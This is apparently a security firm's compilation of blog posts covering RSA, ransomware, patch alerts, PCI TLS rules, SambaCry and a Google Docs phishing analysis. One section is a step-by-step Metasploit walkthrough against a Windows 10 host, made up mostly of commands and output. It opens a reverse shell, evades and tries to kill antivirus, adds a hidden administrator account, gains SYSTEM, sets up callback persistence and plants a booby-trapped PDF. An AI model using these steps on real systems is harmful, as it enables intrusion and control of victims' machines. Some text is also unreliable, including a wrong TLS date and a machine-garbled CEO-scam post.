RSA is one of the most successful, asymmetric encryption systems today. Originally discovered in 1973 by the British intelligence agency GCHQ, it received the classification “top secret”. We have to thank the cryptologists Rivest, Shamir and Adleman for its civil rediscovery in 1977. They stumbled across it during an attempt to solve another cryptographic problem.

As opposed to traditional, symmetric encryption systems, RSA works with two different keys: A public and a private one. Both work complementary to each other, which means that a message encrypted with one of them can only be decrypted by its counterpart. Since the private key cannot be calculated from the public key, the latter is generally available to the public.

Those properties enable asymmetric cryptosystems to be used in a wide array of functions, such as digital signatures. In the process of signing a document, a fingerprint encrypted with RSA, is attached to the file, and enables the receiver to verify both the sender and the integrity of the document. The security of RSA itself is mainly based on the mathematical problem of integer factorization. A message that is about to be encrypted is treated as one large number. When encrypting the message, it is raised to the power of the key, and divided with remainder by a fixed product of two primes. By repeating the process with the other key, the plaintext can be retrieved again. The best currently known method to break the encryption requires factorizing the product used in the division. Currently, it is not possible to calculate these factors for numbers greater than 768 bits. That is why modern cryptosystems use a minimum key length of 3072 bits.


Keep updated with the cyber security standards by checking back to our news page. Our next writeup will be on asymmetrical and symmetrical encryptions.


Stay in touch by emailing or use our website. Click here to contact us.


Cyber Security Predictions - 2018

IDSS Cyber Security Prediction 2018


With the new year finally upon us, it is time to prepare of new cyber security compliances and regulations. It is also time to prepare for new threats and attacks. Cyber crimes are a evolving landscape, changing with the defenses and security mechanisms.


One of the major changes for 2018 is related to the EU and GDPR compliance. Companies the United States are other areas that do business within the EU will need to comply with this standard. This is a big change from the Safe Harbor and the previous compliance standards. Contact IDSS for services to ensure your compliance.


Multi-Factor Authentication

We predict in 2018 the downward spiral of password only authentication. Two-Factor authentication will be on the upward spiral. This is not going to be focused on web-facing services. It will include internal services too. Passwords are easily cracked and social engineered. Adding the second layer of authentication will improve the security and authorization to services.


State Sponsored Cyber Attacks

We at IDSS are also predicting State Sponsored cyber attacks will increase. The global cyber war is growing and become more relevant. The usual suspects for state-sponsored attacks, North Korea, Iran, and Russia. These countries don’t have much to lose by continuing their attempts to extort, steal, spy and disrupt by infiltrating information systems. All are already heavily sanctioned, and the consequences. At least those we know about in response to state-sponsored attacks have been minimal.


IoT Attacks

Millions of connected devices have little or no defense against hackers who want to gain control of them. In fact, it’s getting easier for hackers to take over scores of internet of things (IoT) devices. All they have to do is purchase a botnet kit from the dark web and they are in business.


Automation of some threat-detection tasks will increase

Security teams wade through massive volumes of alerts and data every day to determine what is or isn’t a likely threat. That volume will increase, driven by more attacks and more attack vectors. Filtering the alert data is repetitive, tedious work, which makes it a perfect candidate to automate using software.


With all the new attacks, we at IDSS sadly predict that consumers will lose trust in online transaction and become more aware of cyber security mechanisms. We at IDSS are changing the cyber security threat alerting and predictions. Contact us to get more information.

The Rabbit is Running !

A new ransomware campaign has hit a number of high profile targets in Russia and Eastern Europe.

Dubbed Bad Rabbit, the ransomware first started infecting systems on Tuesday 24 October, and the way in which organizations appear to have been hit simultaneously immediately drew comparisons to this year's WannaCry and Petya epidemics.

Following the initial outbreak, there was some confusion about what exactly Bad Rabbit is. Now the initial panic has died down, however, it's possible to dig down into what exactly is going on.

1. The cyber-attack has hit organisations across Russia and Eastern Europe

Organisations across Russian and Ukraine -- as well as a small number in Germany, and Turkey -- have fallen victim to the ransomware. Researchers at Avast say they've also detected the malware in Poland and South Korea.

Russian cybersecurity company Group-IB confirmed at least three media organizations in the country have been hit by file-encrypting malware, while at the same time Russian news agency Interfax said its systems have been affected by a "hacker attack" -- and were seemingly knocked offline by the incident.

Other organizations in the region including Odessa International Airport and the Kiev Metro also made statements about falling victim to a cyber-attack, while CERT-UA, the Computer Emergency Response Team of Ukraine, also posted that the "possible start of a new wave of cyberattacks to Ukraine's information resources" had occurred, as reports of Bad Rabbit infections started to come in.

At the time of writing, it's thought there are almost 200 infected targets and indicating that this isn't an attack like WannaCry or Petya was -- but it's still causing problems for infected organizations.

"The total prevalence of known samples is quite low compared to the other "common" strains," said Jakub Kroustek, malware analyst at Avast.

2. It's definitely ransomware

Those unfortunate enough to fall victim to the attack quickly realized what had happened because the ransomware isn't subtle -- it presents victims with a ransom note telling them their files are "no longer accessible" and "no one will be able to recover them without our decryption service".

Bad Rabbit ransom note.

Image: ESET

Victims are directed to a Tor payment page and are presented with a countdown timer. Pay within the first 40 hours or so, they're told, and the payment for decrypting files is 0.05 bitcoin -- around $285. Those who don't pay the ransom before the timer reaches zero are told the fee will go up and they'll have to pay more.


Bad Rabbit payment page.

Image: Kaspersky Lab

The encryption uses DiskCryptor, which is open source legitimate and software used for full drive encryption. Keys are generated using CryptGenRandom and then protected by a hardcoded RSA 2048 public key.

3. It's based on Petya/Not Petya

If the ransom note looks familiar, that's because it's almost identical to the one victims of June's Petya outbreak saw. The similarities aren't just cosmetic either -- Bad Rabbit shares behind-the-scenes elements with Petya too.

Analysis by researchers at Crowdstrike has found that Bad Rabbit and NotPetya's DLL (dynamic link library) share 67 percent of the same code, indicating the two ransomware variants are closely related, potentially even the work of the same threat actor.

4. It spreads via a fake Flash update on compromised websites

The main way Bad Rabbit spreads is drive-by downloads on hacked websites. No exploits are used, rather visitors to compromised websites -- some of which have been compromised since June -- are told that they need to install a Flash update. Of course, this is no Flash update, but a dropper for the malicious install.


A compromised website asking a user to install a fake Flash update which distributes Bad Rabbit.

Image: ESET

Infected websites -- mostly based in Russia, Bulgaria, and Turkey -- are compromised by having JavaScript injected in their HTML body or in one of their .js files.

5. It can spread laterally across networks...

Much like Petya, Bad Rabbit comes with a potent trick up its sleeve in that it contains an SMB component which allows it to move laterally across an infected network and propagate without user interaction, say researchers at Cisco Talos.

What aids Bad Rabbit's ability to spread is a list of simple username and password combinations which it can exploit to brute-force its way across networks. The weak passwords list consists of a number of the usual suspects for weak passwords such as simple number combinations and 'password'.

6. ... but it doesn't use EternalBlue

When Bad Rabbit first appeared, some suggested that like WannaCry, it exploited the EternalBlue exploit to spread. However, this now doesn't appear to be the case.

"We currently have no evidence that the EternalBlue exploit is being utilized to spread the infection," Martin Lee, Technical Lead for Security Research at Talos told ZDNet.

7. It may not be indiscriminate

At the same point following the WannaCry outbreak, hundreds of thousands of systems around the world had fallen victim to ransomware. However, Bad Rabbit doesn't appear to indiscriminately infecting targets, rather researchers have suggested that it only infects selected targets.

"Our observations suggest that this been a targeted attack against corporate networks," said Kaspersky Lab researchers.

Meanwhile, researchers at ESET say instructions in the script injected into infected websites "can determine if the visitor is of interest and then add content to the page" if the target is deemed suitable for infection.

However, at this stage, there's no obvious reason why media organisations and infrastructure in Russia and Ukraine has been specifically targeted in this attack.

8. It isn't clear who is behind it

At this time, it's still unknown who is distributing the ransomware or why, but the similarity to Petya has led some researchers to suggest that Bad Rabbit is by the same attack group -- although that doesn't help identify the attacker or the motive either, because the perpetrator of June's epidemic has never been identified.

What marks this attack out is how it has primarily infected Russia - Eastern Europe cybercriminal organisations tend to avoid attacking the 'motherland', indicating this unlikely to be a Russian group.

9. It contains Game of Thrones references

Whoever it behind Bad Rabbit, they appear to be a fan of Game of Thrones: the code contains references to Viserion, Drogon, and Rhaegal, the dragons which feature in television series and the novels it is based on. The authors of the code are therefore not doing much to change the stereotypical image of hackers being geeks and nerds.

References to Game of Thrones dragons in the code.

Image: Kaspersky Lab

10. You can protect yourself against becoming infected by it

At this stage, it's unknown if it's possible to decrypt files locked by Bad Rabbit without giving in and paying the ransom - although researchers say that those who fall victim shouldn't pay the fee, as it will only encourage the growth of ransomware.

A number of security vendors say their products protect against Bad Rabbit. But for those who want to be sure they don't potentially fall victim to the attack, Kaspersky Lab says users can block the execution of file 'c: \ windows \ infpub.dat, C: \ Windows \ cscc.dat.' in order to prevent infection.



Contact IDSS for Prevention and resolution!




PATCH TUESDAY ALERT !! Microsoft needs you!

Microsoft today released patches for more than 60 CVE-listed vulnerabilities in its software. Meanwhile, Adobe is skipping October's Patch Tuesday altogether.

Among the latest holes that need papering over via Windows Update are three vulnerabilities already publicly disclosed – with one being exploited right now by hackers to infect vulnerable machines. That flaw, CVE-2017-11826, is leveraged when a booby-trapped Microsoft Office documentis opened, allowing malicious code within it to run with the same rights as the logged-in user, and should be considered a top priority to patch.

Dustin Childs, of Trend Micro's Zero Day Initiative, noted today that users and administrators should also pay special attention to Microsoft's ADV170012, an advisory warning of weak cryptographic keys generated by Trusted Platform Modules (TPMs) on Infineon motherboards.

Essentially, you should install Microsoft's patch, which will generate new and stronger RSA keys in software as required, and next check to see if you should apply a firmware fix from Infineon.

Computers from HP Inc, Acer, Fujitsu, and others – even Chromebooks – as well as any hand-built machines using the blighted hardware, are affected by Infineon's TPM chipset bug. The flaw is not limited to Microsoft Windows: it affects all operating systems using the dodgy TPM. If you use BitLocker, biometric authentication, or similar, on the at-risk hardware, on Windows, you should sit up and read the following, though.

According to Microsoft:

This vulnerability is present in a specific vendor’s TPM firmware that is based on Trusted Computing Guidelines (TCG) specification family 1.2 and 2.0, not in the TPM standard or in Microsoft Windows. Some Windows security features and potentially third-party software rely on keys generated by the TPM (if available on the system).

Microsoft is releasing Windows security updates to help work around the vulnerability by logging events and by allowing the generation of software based keys. Even after the operating system and/or TPM firmware updates are installed, you will need to carry out additional remediation steps to force regeneration of previously created weak TPM keys, depending on the applicable services you are running and on your particular use-cases.

"While this doesn’t have the same broad attack surface as a vulnerability in a web browser, anyone who can [exploit the TPM bug] is likely a sophisticated and determined attacker," Childs said.

"While that remains unlikely, system administrators must take this critical-rated threat seriously."

Aside from the actively exploited Office flaw, the two other publicly disclosed but not yet targeted in the wild vulnerabilities are CVE-2017-11777, a cross-site scripting flaw in SharePoint Server, and CVE-2017-8703, an object handling error in the Windows Subsystem for Linuxthat would let a malicious app crash the machine.

A pair of flaws in the Windows font libraryCVE-2017-11762 and CVE-2017-11763, can allow a web page or document execute malicious code on a vulnerable computer: visiting a website or opening a file with a specially crafted embedded font can cause malware within the font data to run and hijack the PC.

The scripting engine in Internet Explorer and Edge has 19 flaws that could allow webpages to achieve remote-code execution, with the logged-on user's permissions, via memory corruption (CVE-2017-11792CVE-2017-11793, and CVE-2017-11796, for example). Opening a webpage on a vulnerable computer can potentially trigger the execution of malware, spyware, ransomware, and other software nasties. The Windows Shell was found to contain two remote code execution flaws, CVE-2017-11819 and CVE-2017-8727, that can be targeted through Redmond's browsers: a dodgy webpage can attack Microsoft's text-handling code to potentially run malware.

Qualys analyst Jimmy Graham noted that this patch load is the fourth consecutive release to address a remote code execution bug in Windows Search, the latest being CVE-2017-11771. The flaw can be leveraged by firing specially crafted messages over the network to the machine's Windows Search service, injecting potentially evil code into the machine to run.

"As with the others, this vulnerability can be exploited remotely via SMB to take complete control of a system, and can impact both servers and workstations," said Graham.

"While an exploit against this vulnerability can leverage SMB as an attack vector, this is not a vulnerability in SMB itself, and is not related to the recent SMB vulnerabilities leveraged by EternalBlue, WannaCry, and Petya."

Elsewhere in the patch load was CVE-2017-11779, a remote code execution bug in the Windows DNS client that could be exploited by accidentally connecting to a malicious DNS server: more technical details on that can be found here. There's also flaw in Windows TRIE (CVE-2017-11769) that lets DLL files achieve remote code execution, and a programming blunder that leaves emails in Outlook open to eavesdropping (CVE-2017-11776) over supposedly secure connections. According to Microsoft:

An information disclosure vulnerability exists when Microsoft Outlook fails to establish a secure connection. An attacker who exploited the vulnerability could use it to obtain the email content of a user. The security update addresses the vulnerability by preventing Outlook from disclosing user email content.

While the 62 fixes are a heavy load from Microsoft, admins can take heart in the knowledge that there won't be a Flash update to wrangle this month. Instead Adobe said it would release an update to Flash Player that cleans up performance and stability bugs for Windows, macOS and Linux versions. ®






Contact IDSS for mitigation services and consulting.

PCI says goodbye to early Encryption Protocols. A

PCI-DSS will say goodbye to a good ol encryption protocol. We will not miss you!


Every company need to prepare for PCI compliance changes coming in 2018. In the beginning using an encryption protocol such as SSL/TLS was sufficient. As the threat landscape evolves, compliance requirements must evolve too. With that said, as of June 2018, early version of TLS will be considered a PCI finding, resulting in a non compliant report.


What version will flag as vulnerable?


TLS version 1.1 or higher is the baseline requirement. TLS v1.2 is strongly encouraged by security professionals such as IDSS, in order to meet the PCI Data Security Standards for safeguarding payment data.


What is SSL/early TLS?


Transport Layer Security (TLS) is a cryptographic protocol used to establish a secure communications channel between two systems. It is used to authenticate one or both systems, and protect the confidentiality and integrity of information that passes between systems. It was originally developed as Secure Sockets Layer (SSL) by Netscape in the early 1990s. Standardized by the Internet Engineering Taskforce (IETF), TLS has undergone several revisions to improve security to block known attacks and add support for new cryptographic algorithms, with major revisions to SSL 3.0 in 1996, TLS 1.0 in 1990, TLS 1.1 in 2006, and TLS 1.2 in 2008.


What is the risk of using SSL/early TLS?

There are many serious vulnerabilities in SSL and early TLS that left unaddressed put organizations at risk of being breached. The widespread POODLE and BEAST exploits are just a couple examples of how attackers have taken advantage of weaknesses in SSL and early TLS to compromise organizations.

According to NIST, there are no fixes or patches that can adequately repair SSL or early TLS. Therefore, it is critically important that organizations upgrade to a secure alternative as soon as possible, and disable any fallback to both SSL and early TLS.


Are you susceptible to SSL/early TLS vulnerabilities?

Online and e-commerce environments using SSL and early TLS are most susceptible to the SSL exploits, but the 30 June 2018 PCI DSS migration date applies to all environments - except for payment terminals (POIs) (and the SSL/TLS termination points to which they connect) that can be verified as not being susceptible to any known exploits for SSL and early TLS.


What should organizations do if their ASV scan flags the presence of SSL and the scan fails?


You have until June 30th of 2018 to change setting to prevent SSL/early TLS protocols from being used. This can be configured on the server end, for all public facing servers. Including but not limited to POS terminals, Email Servers, Web-Servers. You can submit a mitigation plan to your ASV, Approved Scanning Vendor, to allow the risk to be flagged as mitigated. This only give you compliant reports until June 30th of 2018. After that date, you will be required to change the configurations to be compliant.


While 30 June 2018 is still a few months away, it takes time to migrate to more secure protocols and organizations should not delay:

  • Migrate to a minimum of TLS 1.1, preferably TLS 1.2. While it is possible to implement countermeasures against some attacks on TLS, migrating to a later version of TLS (TLS 1.2 is strongly encouraged) is the only reliable method to protect against the current protocol vulnerabilities.

  • Patch TLS software against implementation vulnerabilities. Implementation vulnerabilities, such as Heartbleed in OpenSSL, can pose serious risks. Keep TLS software up-to-date to ensure it is patched against these vulnerabilities, and have countermeasures for other attacks.

  • Configure TLS securely. In addition to providing support for later versions of TLS, ensure the TLS implementation is configured securely. Ensure that secure TLS cipher suites and key sizes are supported, and disable support for other cipher suites that are not necessary for interoperability. For example, disable support for weak “Export-Grade” cryptography, which was the source of the recent Logjam vulnerability.

  • Use PCI SSC resources. Visit the PCI SSC website for resources that can help with SSL/early TLS migration, including detailed guidance, a webinar and a number of FAQs.




Contact IDSS for Mitigation steps and consutling. We are here to ensure your compliance!



MSF Console Exploits Windows 10

Get connected:

*] Started reverse TCP handler on 192.168.XX.XX:4444 
[*] 192.168.XX.XX:445 - Connecting to the server...
[*] 192.168.XX.XX:445 - Authenticating to 192.168.XX.XX:445|as user 'target'...
[*] 192.168.XX.XX:445 - Selecting PowerShell target
[*] 192.168.XX.XX:445 - Executing the payload...
[+] 192.168.XX.XX:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.XX.XX
[*] Meterpreter session 2 opened (192.168.XX.XX:4444 -> 192.168.XX.XX:49477) at 2017-09-13 09:39:54 -0700

Migrate from one process to another

meterpreter > run post/windows/manage/migrate

[*] Running module against Target-DT
[*] Current server process: powershell.exe (9632)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 14844
[+] Successfully migrated to process 14844

meterpreter > run post/windows/manage/migrate

[*] Running module against Target-DT
[*] Current server process: notepad.exe (14844)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 7632
[+] Successfully migrated to process 7632

Some more fun

Check for countermeasures on current system

meterpreter > run getcountermeasure

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]     Domain profile configuration (current):
[*]     -------------------------------------------------------------------
[*]     Operational mode                  = Enable
[*]     Exception mode                    = Enable
[*]     Standard profile configuration:
[*]     -------------------------------------------------------------------
[*]     Operational mode                  = Enable
[*]     Exception mode                    = Enable
[*]     IMPORTANT: Command executed successfully.
[*]     However, "netsh firewall" is deprecated;
[*]     use "netsh advfirewall firewall" instead.
[*]     For more information on using "netsh advfirewall firewall" commands
[*]     instead of "netsh firewall", see KB article 947709
[*]     at .
[*] Checking DEP Support Policy...

Lets Try to kill the Anti-Virus now
meterpreter > use post/windows/manage/killav
Loading extension post/windows/manage/killav...
[-] Failed to load extension: No module of the name ext_server_post/windows/manage/killav.x86.dll found

Lets get some network info
meterpreter >  run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.X.0/
Local subnet: 192.168.X.0/

Now, Lets setup a RDP connection
meterpreter > run getgui -u target\target -p ************

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez
[*] Setting user account for logon
[*]     Adding User: targettarget with Password: ***********
[*]     Hiding user from Windows Login screen
[*]     Adding User: targettarget to local group 'Remote Desktop Users'
[*]     Adding User: gtargettarget to local group 'Administrators'
[*] You can now login with the created user

Lets test the RDP connection
joey@sil3ntz:~$ rdesktop -u targettarget -p ********* 192.168.X.XX
Autoselected keyboard map en-us
ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
Connection established using SSL.

<insert screenshot>

BOOM !  Access confirmed.

You can confirm access and user creation in the control panel of the compromised system

Ok, lets clean up the trail now

meterpreter > run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20170913.5300.rc
Console Multi Command Execution Meterpreter Script 

Let's migrate to another process to stay ahead of the AV software

meterpreter > run post/windows/manage/migrate

[*] Running module against Target-DT
[*] Current server process: notepad.exe (7632)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2532
[+] Successfully migrated to process 2532

Lets check the privledges on this system

meterpreter > getprivs
Enabled Process Privileges

Now lets PWN the system
meterpreter > getsystem system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Run this in the background to exploit some more

Don't forget to migrate !

meterpreter > background 
[*] Backgrounding session 2...


msf exploit(psexec) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > show options 

Module options (exploit/windows/local/bypassuac):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SESSION                     yes       The session to run this module on.
   TECHNIQUE  EXE              yes       Technique to use if UAC is turned off (Accepted: PSH, EXE)

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf exploit(bypassuac) > set session 2
session => 2


msf exploit(bypassuac) > exploit 

[*] Started reverse TCP handler on 192.168.X.XX:4444 
[-] Exploit aborted due to failure: none: Already in elevated state  <---- BOOM !!
[*] Exploit completed, but no session was created.
msf exploit(bypassuac) > 

Lets make this a persistant connection

msf exploit(bypassuac) > set payload windows/meterpreter/reversetcp
[-] The value specified for payload is not valid.
msf exploit(bypassuac) > show options 

Module options (exploit/windows/local/bypassuac):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SESSION    2                yes       The session to run this module on.
   TECHNIQUE  EXE              yes       Technique to use if UAC is turned off (Accepted: PSH, EXE)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.X.XX    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

meterpreter > run persistence –A –L c:\\ -X 5 –p <port> –r <your-ip>

Now lets upload some malicious files, which we created in an earlier class. It has a reverse tcp connector embedded

meterpreter > upload /home/joey/Documents/exploits/Insurance_Updates.pdf C:/Users/target/Desktop
[*] uploading  : /home/joey/Documents/exploits/Insurance_Updates.pdf -> C:/Users/target/Desktop
[*] uploaded   : /home/joey/Documents/exploits/Insurance_Updates.pdf -> C:/Users/target/Desktop\Insurance_Updates.pdf

Hacking Back the Hackers -- Should you?

I have been hacked !!  I am going to attack !!

Let's not mince words: Cyberattacks suck. Whether criminals are hacking our passwords, or Anonymous is simply making a statement, the disruptions and data breaches exact a heavy toll in terms of time, money, and security. For example, after the Associated Press Twitter account was hacked and bogus news was posted about an attack on the White House, the U.S. stock market took a nosedive.

The often dire consequences of cyberattacks have the attention of the highest levels of government. Just yesterday, U.S. senators called on the Obama Administration to pursue sanctions against countries believed to be active in cyberattacks. Cybersecurity is one of the issues Secretary of State John Kerry will discuss when he visits Japan this month.

All this talk is great, but back in the here and now, the situation is tough. When cyberattacks occur—and they will—there’s little you can do except control the damage. Unless you hack back, that is.

Digital revenge is sweet—and illegal

Loosely defined, "hacking back" involves turning the tables on a cyberhacking assailant: thwarting or stopping the crime, or perhaps even trying to steal back what was taken. How that digital revenge is wreaked, and whether any of it is legal, are issues being actively debated right now—to the extent that anyone wants to talk about it, let alone admit to trying it. But there's one thing security experts can agree on: Hack-backs are a tempting response to a frustrating situation.

Hacking back at a cyber-assailant is tempting, but it's just as illegal as the original cyberattack.

Let’s talk about the illegal part first. Even if we skip the obvious moral issues around vigilante justice, hacking back quickly runs afoul of the Computer Fraud and Abuse Act. This law has undergone numerous revisions since it was first enacted in 1986, but Title 18, Sec. 1030 is clear on the point that using a computer to intrude upon or steal something from another computer is illegal.

“There is no law that actually allows you to engage in an attack,” says Ray Aghaian, a partner with McKenna Long & Aldridge, and a former attorney with the Department of Justice’s Cyber & Intellectual Property Crimes Section.“If you attack an attacker, you’re in the same boat," he says.

The only kind of hacking back that's considered tolerable is what you might enact defensively within your own computer or network. What’s clearly illegal are offensive hacks, where you leave your territory and actively pursue an assailant online.

Counterintelligence as a service

Even if companies can't hack back, they can learn more about their assailants. Eric Ahlm, a Security Research Director with Gartner, sees a burgeoning business in gathering information about cybercriminals. “The world of counterintelligence as a service is certainly growing,” says Ahlm.

According to Ahlm, the companies tracking the bad guys collect vast amounts of data on Internet activity and can hone in on specific “actors” who engage in criminal activity. “Without touching or hacking the individual, they can tell you how trustworthy they are, where they are, what kind of systems they use," says Ahlm. "They could link a device to an identity.”

While private companies cannot take offensive action with any such intelligence, they can use it defensively to thwart suspicious actors if they're found to be sniffing around company data. “Based off your intelligence of who’s touching you,” says Ahlm, “you can selectively disconnect them or greatly slow them down from network access.” The simple act of slowing down access may be enough to motivate some hackers to look elsewhere.

Fighting back has its risks

Slowdown tactics are routine for CloudFlare, a company that supports websites with performance optimization, security, and other technologies.“In the grand scheme of fight-back tricks, this is one that causes relatively little harm but does a lot of good," says Matthew Prince, co-founder and CEO. "If we are tying up a bad guy’s resources, they have less time to attack the good guys.”

The risk with hacking back is that the assailant could retaliate, escalating the danger.

While cybersecurity is an integral part of CloudFlare’s business, Prince cautions that any interaction with attackers carries risk. “Some people out there are real criminals. They have a way of fighting back," he says.

Prince cites the example of Blue Security as a cautionary tale. This company drew raves—as well as criticism—for creating a way to spam back at spammers, clogging their systems and preventing them from sending out more spam. But the spammers fought back, unleashing attacks on Blue Security that caused collateral damage on the Internet. The company eventually closed down operations. “You can easily get in over your head,” says Prince.

Hacking back may never be legal

Now that data represents the biggest asset of many companies, the desire to protect that data intensifies and makes offensive measures seem almost a business imperative. Could some form of legal justification be far behind? If hack-backs were ever legalized, Aghaian says, “there needs to be proportionality." In other words, the hack-back can’t be worse than the original hack.The complexity of determining proportionality, however, is one of many reasons why hacking back may never surmount its significant moral, legal, and practical issues.

Hacking back can also have unintended consequences, such as damaging hijacked computers belonging to otherwise innocent individuals, while real criminals remain hidden several layers back on the Internet. If you hack back and hurt someone else instead, “you have to be willing to bear the consequences and pay for the damages,” says Aghaian.

The more prudent approach, says Aghaian, is to focus resources on protecting your data—and prioritizing which data gets the most protection. “Isolate and identify your crown jewels,” says Aghaian, “Your chances of protecting that are far better than trying to protect everything.”

No matter how frustrating it can be to fend off cyberattacks, the risks of fighting back are significant. You have to identify the perpetrator. You have to figure out the best way to hack back. Wherther or not the hack works, you could face retaliation. While the idea of hacking back is deeply satisfying, its risks remain greater than the potential reward.

Lets chat? Contact Us

Thank you PC World for the KB. 

SambaCry - Not just Windows Anymore !!

A 7-year-old critical remote code execution vulnerability has been discovered in Samba networking software that could allow a remote attacker to take control of an affected Linux and Unix machines.

Samba is open-source software (re-implementation of SMB networking protocol) that runs on the majority of operating systems available today, including Windows, Linux, UNIX, IBM System 390, and OpenVMS.

Samba allows non-Windows operating systems, like GNU/Linux or Mac OS X, to share network shared folders, files, and printers with Windows operating system.

The newly discovered remote code execution vulnerability (CVE-2017-7494) affects all versions newer than Samba 3.5.0 that was released on March 1, 2010.
"All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it," Samba wrote in an advisory published Wednesday.

According to the Shodan computer search engine, more than 485,000 Samba-enabled computers exposed port 445 on the Internet, and according to researchers at Rapid7, more than 104,000 internet-exposed endpoints appeared to be running vulnerable versions of Samba, out of which 92,000 are running unsupported versions of Samba.
Since Samba is the SMB protocol implemented on Linux and UNIX systems, so some experts are saying it is "Linux version of EternalBlue," used by the WannaCry ransomware.
...or should I say SambaCry?

Keeping in mind the number of vulnerable systems and ease of exploiting this vulnerability, the Samba flaw could be exploited at large scale with wormable capabilities.
Home networks with network-attached storage (NAS) devices could also be vulnerable to this flaw.

The flaw actually resided in the way Samba handled shared libraries. A remote attacker could use this Samba arbitrary module loading vulnerability (POC code) to upload a shared library to a writable share and then cause the server to load and execute malicious code.
The vulnerability is hell easy to exploit. Just one line of code is required to execute malicious code on the affected system.


However, the Samba exploit has already been ported to Metasploit, a penetration testing framework, enabling researchers as well as hackers to exploit this flaw easily.

Patch and Mitigations

The maintainers of Samba has already patched the issue in their new versions Samba versions 4.6.4/4.5.10/4.4.14, and are urging those using a vulnerable version of Samba to install the patch as soon as possible.
But if you can not upgrade to the latest versions of Samba immediately, you can work around the vulnerability by adding the following line to your Samba configuration file smb.conf:
nt pipe support = no

Once added, restart the network's SMB daemon (smbd) and you are done. This change will prevent clients from fully accessing some network machines, as well as disable some expected functions for connected Windows systems.

While Linux distribution vendors, including Red Hat and Ubuntu, have already released patched versions for its users, the larger risk is that from NAS device consumers that might not be updated as quickly.

Craig Williams of Cisco said that given the fact that most NAS devices run Samba and have very valuable data, the vulnerability "has potential to be the first large-scale Linux ransomware worm."

Update: Samba maintainers have also provided patches for older and unsupported versions of Samba.
Meanwhile, Netgear released a security advisory for CVE-2017-7494, saying a large number of its routers and NAS product models are affected by the flaw because they use Samba version 3.5.0 or later.
However, the company currently released firmware fixes for only ReadyNAS products running OS 6.x.


Google Docs Phish is BACK !!


Recently there have been a few google doc focused phishing attempts. The goal of this phish it is to have the end users grant access to email contacts, messages, documents and settings to the malicious attacker. This allows the attacker to email the link from your account to all users in your contact list. The next phase is to pass the malicous content to your contacts. Leading to automatic propagation to their contacts, and so on.


Be aware that google doesn’t refer to the document storage or management services as Google Doc any more. It is now referred to as Google Drive. Knowing this would improve your chances of spotting this phishing attempt.


Summary of details and what to look out for.

The emails FROM address is currently

This should be suspicious to any users that receive this email. Be on the lookout for automated email sending services you are not subscribed to.

The sending servers are and

These email services are used to send out email campaigns, mass emails, and marketing emails. This service doesn’t monitor intent of the emails.

The malicious link is

This is the link that you get redirected to when you click the body of the email to open the google doc.

The site is hosted in CloudFare, a public cloud hosting service.

This type of service provides the attacker with a server to run the malicious code and collect the data.

We at IDSS have discovered the source code and have broke it down in details. We feel knowing how the malicious php file works, will educate our audience to provide better security awareness.

First lets discuss how it attains access to your google contacts and content.

When you click “Allow” at the prompt, confirming the application can collect data from your account. It triggers the script below.

// Your Client ID can be retrieved from your project in the Google

// Developer Console,

var CLIENT_ID = '';

var CLIENT_ID_2 = '';

After this script is ran, the redirect occurs.


First is trys to connect using the google Oauth api connector and checks for faults

var redirect_url = '' + encodeURIComponent(CLIENT_ID) + '&' + encodeURIComponent('') + '&customparam=customparam';

If that fails due to two-factor authentication or other security settings. It will then check for google ID’s and tags to get access.

var redirect_url_2 = '' + encodeURIComponent(CLIENT_ID_2) + '&' + encodeURIComponent('') + '&customparam=customparam';

var alert_url = '';


Next, as all good code does, it checks to make sure you confirmed access and that they access connector is established.


function checkAuth() {



'client_id': CLIENT_ID,

'scope': SCOPES.join(' '),

'immediate': true

}, handleAuthResult);

Now it will collect your contact information, using the API ID from your account.


* Load Gmail API client library. List labels once client library

* is loaded.


function loadGmailApi() {

gapi.client.load('gmail', 'v1', listContacts());




* Print all Contacts in the authorized user's account. If no contacts

* are found an appropriate message is printed.


function listContacts()

To ensure that this is not reverse engineered, we will summarize the rest of the code in the following statement.

The rest of the code then sorts and organizes the collected information for storage and usage in the future. Just because you clicked the link today, doesn’t mean your contacts will get the email the same day. The attacker set a threshold timer to send out the emails on a rolling schedule.


If you are think you may have been a victim of this phishing attempt, contact IDSS for assistance in the resolution.



CEO Scam - Are you aware? - Repost from March 2016

CEO Scam Emails - Reposted from March 2016


The branch of homeland protection sends a clean message to business proprietors: You want to make sure your enterprise’s cyber services are with qualified experts to secure all gadgets, networks, and information.

Cyber attacks are prolific nowadays, and, in line with the FBI, great, sophisticated cyber crime is not only a chance at the highest stages of our kingdom, however additionally to people, companies of all sizes, and other groups in the private and public sector.

As your commercial coverage companion, Bearingstar’s position is always that will help you shield your business, your employees, your centers, and, ultimately, the customers who use your services or products. A cyber assault can jeopardize the safety and reliability of all of these, so we want to offer you with a sequence of four key cyber protection guidelines which you, and your whole group, can initiate these days.

